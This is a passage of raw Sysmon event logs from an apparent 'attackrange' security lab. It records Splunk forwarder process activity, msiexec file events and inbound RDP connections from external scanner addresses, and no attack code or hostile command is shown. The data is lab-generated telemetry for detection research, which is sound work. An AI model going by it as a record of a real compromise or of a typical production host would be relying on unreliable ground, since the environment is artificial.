Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000050150Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:57.754{85C0FFC9-EBB9-607E-E606-00000000BB01}3292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000050149Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:54.705{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52517-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000050148Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:54.568{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-62628-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 10341000x800000000000000050147Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:57.191{85C0FFC9-EBB9-607E-E506-00000000BB01}1748392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050146Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:57.082{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EBB9-607E-E506-00000000BB01}1748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050145Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:57.082{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050144Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:57.082{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050143Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:57.082{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050142Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:57.082{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050141Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:57.082{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050140Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:57.082{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050139Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:57.082{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050138Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:57.082{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050137Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:57.082{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050136Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:57.082{85C0FFC9-B7EC-607E-0500-00000000BB01}4161008C:\Windows\system32\csrss.exe{85C0FFC9-EBB9-607E-E506-00000000BB01}1748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000050135Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:57.082{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EBB9-607E-E506-00000000BB01}1748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000050134Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:57.083{85C0FFC9-EBB9-607E-E506-00000000BB01}1748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000073331Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:56.784{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-1177-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000073330Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:56.695{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com55880-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000073329Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:58.843{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=26456B58A85BC069AA274F440EF857A2,SHA256=91E1774C8D5554D754A237664A37165700EF59859C5D3E23133E17544C438CB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073328Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:58.827{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073327Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:58.765{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=F985E1E51BD4FEB45E4931E1523E80EA,SHA256=E168C793E8F8BB7D1EAC66F2B963AAC5E0DD0FE2CCEBAB9CCFC61E8C70CE4293,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073326Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:58.453{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073325Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:58.312{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C81E1C00D4B4839A5DCB0DE46C4AF13,SHA256=B085232753B0C94E08652F9CBA80D81B02E38261423B3124ECD4021FBFFCF82D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073324Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:58.078{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000050179Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:58.551{85C0FFC9-EBBA-607E-E706-00000000BB01}32401060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050178Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:58.426{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EBBA-607E-E706-00000000BB01}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050177Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:58.426{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050176Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:58.426{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050175Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:58.426{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050174Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:58.426{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050173Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 